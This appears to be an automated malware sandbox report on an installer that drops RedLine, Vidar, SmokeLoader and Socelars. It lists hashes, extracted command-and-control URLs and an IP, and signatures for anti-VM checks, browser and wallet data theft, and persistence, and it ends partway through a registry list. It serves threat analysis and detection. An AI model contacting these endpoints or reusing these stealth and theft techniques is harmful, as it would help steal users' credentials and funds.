Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
23/09/2021, 21:08
210923-zyzyaafbfr 1022/09/2021, 10:40
210922-mqyzssehck 1022/09/2021, 05:21
210922-f114ksecck 1021/09/2021, 05:29
210921-f6zspsgdg2 1020/09/2021, 21:51
210920-1qj3jafed9 1020/09/2021, 19:44
210920-yftswafca9 1020/09/2021, 08:28
210920-kczcasgahr 1020/09/2021, 04:42
210920-fb3acafedj 1020/09/2021, 04:42
210920-fb2zksfecr 10Analysis
-
max time kernel
324s -
max time network
1788s -
platform
windows10_x64 -
resource
win10-ja-20210920 -
submitted
20/09/2021, 21:51
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20210920
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
4.0MB
-
MD5
73491325fde5366b31c09da701d07dd6
-
SHA1
a4e1ada57e590c2df30fc26fad5f3ca57ad922b1
-
SHA256
56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11
-
SHA512
28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88
Malware Config
Extracted
vidar
40.7
706
https://petrenko96.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
redline
janesam
65.108.20.195:6774
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5948 5184 rundll32.exe 131 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2176 5184 rundll32.exe 131 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5596 5184 rundll32.exe 131 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral6/memory/504-274-0x00000000063C0000-0x00000000063DD000-memory.dmp family_redline behavioral6/memory/4704-330-0x000000000041C5E2-mapping.dmp family_redline behavioral6/memory/5480-441-0x000000000041C5E2-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral6/files/0x000400000001ac05-143.dat family_socelars behavioral6/files/0x000400000001ac05-186.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 6920 created 4872 6920 WerFault.exe 109 PID 6720 created 1068 6720 WerFault.exe 90 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral6/memory/1388-251-0x0000000000980000-0x0000000000A54000-memory.dmp family_vidar behavioral6/memory/1388-253-0x0000000000400000-0x00000000004D7000-memory.dmp family_vidar -
resource yara_rule behavioral6/files/0x000400000001abfb-123.dat aspack_v212_v242 behavioral6/files/0x000400000001abfb-124.dat aspack_v212_v242 behavioral6/files/0x000400000001abfc-122.dat aspack_v212_v242 behavioral6/files/0x000400000001abfc-127.dat aspack_v212_v242 behavioral6/files/0x000400000001abfe-128.dat aspack_v212_v242 behavioral6/files/0x000400000001abfe-131.dat aspack_v212_v242 -
Blocklisted process makes network request 48 IoCs
flow pid Process 220 5732 MsiExec.exe 221 5732 MsiExec.exe 222 5732 MsiExec.exe 223 5732 MsiExec.exe 224 5732 MsiExec.exe 225 5732 MsiExec.exe 226 5732 MsiExec.exe 227 5732 MsiExec.exe 229 5732 MsiExec.exe 230 5732 MsiExec.exe 231 5732 MsiExec.exe 232 5732 MsiExec.exe 234 5732 MsiExec.exe 235 5732 MsiExec.exe 236 5732 MsiExec.exe 237 5732 MsiExec.exe 238 5732 MsiExec.exe 239 5732 MsiExec.exe 240 5732 MsiExec.exe 241 5732 MsiExec.exe 242 5732 MsiExec.exe 243 5732 MsiExec.exe 244 5732 MsiExec.exe 245 5732 MsiExec.exe 246 5732 MsiExec.exe 247 5732 MsiExec.exe 248 5732 MsiExec.exe 249 5732 MsiExec.exe 251 5732 MsiExec.exe 252 5732 MsiExec.exe 253 5732 MsiExec.exe 254 5732 MsiExec.exe 255 5732 MsiExec.exe 256 5732 MsiExec.exe 257 5732 MsiExec.exe 258 5732 MsiExec.exe 259 5732 MsiExec.exe 260 5732 MsiExec.exe 261 5732 MsiExec.exe 262 5732 MsiExec.exe 263 5732 MsiExec.exe 264 5732 MsiExec.exe 265 5732 MsiExec.exe 266 5732 MsiExec.exe 268 5732 MsiExec.exe 269 5732 MsiExec.exe 270 5732 MsiExec.exe 271 5732 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts Ze2ro.exe -
Executes dropped EXE 62 IoCs
pid Process 4448 setup_installer.exe 4056 setup_install.exe 404 Sun191101c1aaa.exe 504 Sun195a1614ec24e6a.exe 1068 Sun19de8ff4b6aefeb8.exe 1184 Sun19e4ade31b2a.exe 1388 Sun19eb40faaaa9.exe 1332 Sun1905815e51282417.exe 1516 setup_2.exe 964 Sun19262b9e49ad.exe 1968 Sun193fda712d9f1.exe 1800 Sun1917b8fb5f09db8.exe 2920 Sun1966fb31dd5a07.exe 1836 Sun198361825f4.exe 3148 Sun1966fb31dd5a07.tmp 5056 LzmwAqmV.exe 5100 4111071.scr 2764 Ze2ro.exe 4076 Conhost.exe 4484 PublicDwlBrowser1100.exe 4768 2.exe 4872 setup.exe 4900 7574743.scr 2896 udptest.exe 4640 5262791.scr 4392 5.exe 4208 LivelyScreenRecF18.exe 1516 setup_2.exe 4808 2340772.scr 624 Conhost.exe 3500 3002.exe 2776 setup_2.tmp 4704 5262791.scr 3928 jhuuee.exe 5144 BearVpn 3.exe 5308 setup_2.exe 5336 7803407.exe 5536 setup_2.tmp 5696 3002.exe 5812 6203035.exe 5936 6514043.exe 4608 5436869.exe 5264 5844605.exe 5480 6514043.exe 2120 LzmwAqmV.exe 5428 LzmwAqmV.exe 6164 services64.exe 6356 ultramediaburner.exe 6408 Hahypiqidi.exe 6452 ultramediaburner.tmp 6468 Dapicelebae.exe 6712 UltraMediaBurner.exe 5988 GcleanerEU.exe 2840 installer.exe 6816 anyname.exe 5772 gcleaner.exe 7400 sihost64.exe 6824 13AE.exe 7156 3EB7.exe 6180 6FBB.exe 7464 F24A.exe 7596 333.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6203035.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7574743.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2340772.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2340772.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6203035.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5436869.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5436869.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6FBB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6FBB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7574743.scr -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Sun1917b8fb5f09db8.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Hahypiqidi.exe -
Loads dropped DLL 38 IoCs
pid Process 4056 setup_install.exe 4056 setup_install.exe 4056 setup_install.exe 4056 setup_install.exe 4056 setup_install.exe 4056 setup_install.exe 3148 Sun1966fb31dd5a07.tmp 2776 setup_2.tmp 5536 setup_2.tmp 5992 rundll32.exe 2956 rundll32.exe 2840 installer.exe 2840 installer.exe 2840 installer.exe 5304 MsiExec.exe 5304 MsiExec.exe 7600 rundll32.exe 5732 MsiExec.exe 5732 MsiExec.exe 5732 MsiExec.exe 5732 MsiExec.exe 5732 MsiExec.exe 5732 MsiExec.exe 5732 MsiExec.exe 5732 MsiExec.exe 5732 MsiExec.exe 5732 MsiExec.exe 2840 installer.exe 5732 MsiExec.exe 5732 MsiExec.exe 5752 MsiExec.exe 5752 MsiExec.exe 5752 MsiExec.exe 5752 MsiExec.exe 5752 MsiExec.exe 5752 MsiExec.exe 5752 MsiExec.exe 5732 MsiExec.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral6/files/0x000400000001ac27-281.dat themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Laevaeqyrily.exe\"" Ze2ro.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Sun1966fb31dd5a07.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2340772.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ultramediaburner.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA UltraMediaBurner.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6FBB.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Sun198361825f4.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7574743.scr Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA LivelyScreenRecF18.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup_2.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6203035.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5436869.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Dapicelebae.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\A: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com 120 ip-api.com 145 ipinfo.io 146 ipinfo.io -
Drops file in System32 directory 15 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\User_Feed_Synchronization-{51C2619E-6BAC-4F16-BCD0-83AD14025AE1} svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 501C03261A52BA4D svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 4900 7574743.scr 4808 2340772.scr 5812 6203035.exe 4608 5436869.exe 6180 6FBB.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 4640 set thread context of 4704 4640 5262791.scr 129 PID 5064 set thread context of 5460 5064 svchost.exe 149 PID 5936 set thread context of 5480 5936 6514043.exe 154 PID 2120 set thread context of 5428 2120 LzmwAqmV.exe 159 PID 6164 set thread context of 7016 6164 services64.exe 213 -
Drops file in Program Files directory 15 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url msiexec.exe File created C:\Program Files\Microsoft Office 15\VRDUYBAETY\ultramediaburner.exe Ze2ro.exe File created C:\Program Files (x86)\MSBuild\Laevaeqyrily.exe Ze2ro.exe File created C:\Program Files (x86)\MSBuild\Laevaeqyrily.exe.config Ze2ro.exe File opened for modification C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe ultramediaburner.tmp File created C:\Program Files\Microsoft Office 15\VRDUYBAETY\ultramediaburner.exe.config Ze2ro.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini msiexec.exe File created C:\Program Files (x86)\UltraMediaBurner\is-LLPBI.tmp ultramediaburner.tmp File created C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe msiexec.exe File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk msiexec.exe File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url msiexec.exe File created C:\Program Files (x86)\UltraMediaBurner\is-SA4OV.tmp ultramediaburner.tmp -
Drops file in Windows directory 36 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSIA455.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIA24F.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIA62B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB350.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\474fd.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI7C83.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAFF1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB3CE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7D60.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA5CD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB2A3.tmp msiexec.exe File created C:\Windows\Installer\47500.msi msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri Process not Found File opened for modification C:\Windows\Installer\MSI7BB6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA089.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSIA35A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB206.tmp msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIB97F.tmp msiexec.exe File created C:\Windows\Installer\474fd.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI782A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7B28.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7D01.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB46B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7C15.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSIB4F9.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 19 IoCs
pid pid_target Process procid_target 4916 1068 WerFault.exe 90 5208 4640 WerFault.exe 110 5488 4872 WerFault.exe 109 5480 1068 WerFault.exe 90 5828 1068 WerFault.exe 90 6012 4872 WerFault.exe 109 4732 1068 WerFault.exe 90 5804 4872 WerFault.exe 109 908 5936 WerFault.exe 145 1444 4872 WerFault.exe 109 5348 4872 WerFault.exe 109 5900 4872 WerFault.exe 109 6196 1068 WerFault.exe 90 6812 1068 WerFault.exe 90 6920 4872 WerFault.exe 109 4024 1068 WerFault.exe 90 5900 1068 WerFault.exe 90 5724 1068 WerFault.exe 90 6720 1068 WerFault.exe 90 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI setup_2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI setup_2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI setup_2.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7564 schtasks.exe 6568 schtasks.exe -
Kills process with taskkill 2 IoCs
pid Process 6940 taskkill.exe 8092 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 19 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Process not Found Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IFW2IAU0-YI0T-SZ81-840P-PAI76YIYJF79}\650478DC7424C37C svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QAM9LTZ0-JH7G-LF06-519I-JDH27ZPEPA24} svchost.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local 